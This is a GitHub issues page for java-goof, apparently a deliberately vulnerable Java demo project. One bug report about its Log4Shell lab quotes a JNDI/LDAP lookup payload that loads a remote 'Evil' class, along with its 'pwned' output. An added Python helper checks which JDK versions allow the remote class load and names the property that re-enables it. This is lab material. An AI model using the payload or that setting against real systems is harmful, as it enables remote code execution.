
java-goof's People

Contributors

ah7, artursnyk, aviadatsnyk, bmvermeer, cfereday, dogeared, ericsmalling, fauxfaux, fmbenhassine, guypod, lirantal, scott-es, sjmaple, snyk-bot, thetechoddbug, vermava


java-goof's Issues

Application can't be run

The README.md is an exact copy of the original project's. As the README says, go to todolist-web-springmvc, but no directory with this name is provided. Do I need to run the original application to exploit the vulnerability?

Create terraform for provisioning EKS

For K8s demonstrations, I want to have Terraform configs to:

  1. provision an EKS cluster
  2. restrict the ELB's security group ingress to my home IP address
  3. [optional] set route53 DNS to point goof.${my subdomain} to that ELB

log4shell-server maven build failing in docker build

docker build of log4shell-server failing maven build with:

#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] BUILD FAILURE
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] Total time:  9.492 s
#8 11.36 [INFO] Finished at: 2022-01-21T20:23:07Z
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-assembly-plugin:2.2-beta-5:single (default-cli) on project log4shell-server: Error reading assemblies: No assembly descriptors found. -> [Help 1]
#8 11.36 [ERROR] 
#8 11.36 [ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
#8 11.36 [ERROR] Re-run Maven using the -X switch to enable full debug logging.
#8 11.36 [ERROR] 
#8 11.36 [ERROR] For more information about the errors and possible solutions, please read the following articles:
#8 11.36 [ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
------

[BUG]: JDK 8u191 looks like it's not supported in log4shell-goof. Had to use 8u111, which worked successfully.

Is there an existing issue for this?

  • I have searched the existing issues

Description of the bug

When using 8u191 in directory/project log4shell-goof, I received the following error when running mvn exec:java from the client directory (not server):
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.0.0:java (default-cli) on project log4shell-client: An exception occured while executing the Java class.
[ERROR] Unexpected state.
[ERROR] Make sure to remove /tmp/pwned between runs.
[ERROR] Make sure Server is running.
[ERROR] Make sure you JVM is <= 11.0.1 or 8u191 or 7u201 or 6u211

/tmp/pwned didn't exist, the server was running, and I was using JDK version 8u191. I then downgraded to 8u111. I received the success message:

21:35:34.125 [Main.main()] ERROR Main - test
/tmp/pwned DOES NOT EXIST
21:35:34.128 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
/tmp/pwned EXISTS - yah been pwned!

Steps To Reproduce

See above

Additional Information

No response
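The version gate in the report above is the JDK's own default for com.sun.jndi.ldap.object.trustURLCodebase: it flipped to false in 6u211, 7u201, 8u191 and 11.0.1 (October 2018), so from those updates on an LDAP JNDI lookup will not fetch a class from a remote codebase unless the property is set to true explicitly, and the /tmp/pwned marker never appears. That matches the reporter's experience with 8u191 versus 8u111, even though the client's message reads as if 8u191 itself were still in range. The checker below is an added example for this page, not code from java-goof or Snyk; the version thresholds are the documented JDK updates, the treatment of the 9 and 10 lines is an assumption noted in the code, and the sample banners are constructed to mirror the two JDKs from the report.

```python
"""Predict whether the log4shell-goof JNDI/LDAP class load works on a given JDK.

Added example for this page, not code from java-goof or Snyk. It assumes the
demo's remote class fetch depends only on the JDK default of
com.sun.jndi.ldap.object.trustURLCodebase, which became false in
6u211, 7u201, 8u191 and 11.0.1.
"""
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, ...]

# First update in each major line whose default is trustURLCodebase=false.
LDAP_CODEBASE_FIX = {
    6: (6, 211),
    7: (7, 201),
    8: (8, 191),
    11: (11, 0, 1),
}

_OLD_STYLE = re.compile(r"^1\.(\d+)\.\d+(?:_(\d+))?")       # e.g. 1.8.0_191
_NEW_STYLE = re.compile(r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?")  # e.g. 11.0.1, 17


def parse_java_version(text: str) -> Optional[Version]:
    """Turn a bare version string or full `java -version` output into a tuple.

    Legacy 1.x scheme -> (major, update), e.g. "1.8.0_191" -> (8, 191).
    JEP 223 scheme    -> (major, minor, security), e.g. "11.0.1" -> (11, 0, 1).
    Returns None when nothing version-like is present.
    """
    quoted = re.search(r'version "([^"]+)"', text)
    ver = quoted.group(1) if quoted else text.strip()
    old = _OLD_STYLE.match(ver)
    if old:
        return (int(old.group(1)), int(old.group(2) or 0))
    new = _NEW_STYLE.match(ver)
    if new:
        return tuple(int(g or 0) for g in new.groups())
    return None


def remote_codebase_allowed(version: Version) -> bool:
    """True if LDAP JNDI lookups on this JDK still load remote classes by default."""
    major = version[0]
    if major in LDAP_CODEBASE_FIX:
        return version < LDAP_CODEBASE_FIX[major]
    # 12 and later shipped with the restriction already in place.
    # Anything else (pre-6, plus the short-lived 9 and 10 lines, which are
    # assumed here to have ended before the fix) is treated as permissive.
    return major < 12


def demo_expected_to_work(java_version_output: str) -> Optional[bool]:
    """True = the remote class will be loaded, False = blocked, None = unparseable."""
    v = parse_java_version(java_version_output)
    return None if v is None else remote_codebase_allowed(v)


def check_local_jdk() -> Optional[bool]:
    """Ask the JDK on PATH; `java -version` writes its banner to stderr."""
    proc = subprocess.run(["java", "-version"], capture_output=True, text=True)
    return demo_expected_to_work(proc.stderr or proc.stdout)


if __name__ == "__main__":
    # Constructed sample banners mirroring the two JDKs from the issue report,
    # plus a patched 11 and a current 17 for contrast.
    samples = {
        "8u191": 'java version "1.8.0_191"\nJava(TM) SE Runtime Environment (build 1.8.0_191-b12)',
        "8u111": 'java version "1.8.0_111"\nJava(TM) SE Runtime Environment (build 1.8.0_111-b14)',
        "11.0.1": 'openjdk version "11.0.1" 2018-10-16',
        "17.0.2": 'openjdk version "17.0.2" 2022-01-18',
    }
    for label, banner in samples.items():
        verdict = demo_expected_to_work(banner)
        print(f"{label:>7}: {'remote class load expected' if verdict else 'blocked by default'}")
```

Two caveats for anyone using this to set up the lab. A patched JDK can be put back into the permissive state for the demo only with -Dcom.sun.jndi.ldap.object.trustURLCodebase=true on the client JVM, which is why the JDK default is not a substitute for upgrading log4j: the remote codebase path is just the easiest vector, and lookups can still be abused through other deserialization routes on a patched JDK. And the check parses the runtime's self-reported banner, so run it with the same java binary Maven will pick up (JAVA_HOME), not whatever happens to be first on PATH.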

[FEAT]: Readme instructions for scanning

Is there an existing feature request for this?

  • I have searched the existing feature requests

Description

Customers pull down goof, java-goof, etc. all the time. We need instructions that point to the Java scanning documentation and also potentially give scanning instructions; for example, java-goof requires --all-projects or --maven-aggregate-project. While the CLI intelligently does give hints, some customers are very novice on the technical level (i.e. pure security or managers) and need the help (sometimes it's a language barrier).

Additional Information

No response
